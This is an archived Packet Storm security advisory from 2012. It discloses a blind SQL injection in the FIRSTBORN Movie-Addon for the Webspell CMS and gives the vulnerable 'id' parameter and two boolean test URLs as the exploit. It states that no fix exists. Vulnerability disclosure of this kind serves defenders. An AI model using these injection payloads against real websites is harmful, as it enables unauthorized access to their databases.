Webspell FIRSTBORN Movie-Addon Blind SQL Injection

2012-06-08T00:00:00
ID PACKETSTORM:113420
Type packetstorm
Reporter Easy Laster
Modified 2012-06-08T00:00:00

Description

                                        
                                            `========================================================================================  
| # Title : Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability  
| # Author : Easy Laster  
| # Script : Webspell FIRSTBORN Movie-Addon  
| # Site : www.firstborn.de  
| # Price : free  
| # Exploitation : Remote Blind SQL Vulnerability  
| # Bug : Remote Blind SQL Vulnerability  
| # Date : 08.06.2012  
| # Language : PHP  
| # Status : vulnerable  
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest  
====================== Proof of Concept =================================  
  
  
[+] Introduction  
  
FIRSTBORN Movie-Addon is a Addon for the Webspell Web Application for Content Management  
System. In this Addon we found a Remote Blind SQL Injection vulnerability.The Movie file  
is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most   
Webspell Webapplication has a Security System in the Webspell core self.You must bypass  
the core from Webspell Security System (globalskiller).  
  
  
[+] Vulnerability  
  
http://[host]/[path]/index.php?site=movies&action=show&id=[vul]  
  
[+] Exploit  
  
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=1--+  
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=2--+  
  
[+] Fix  
  
No fix.  
  
`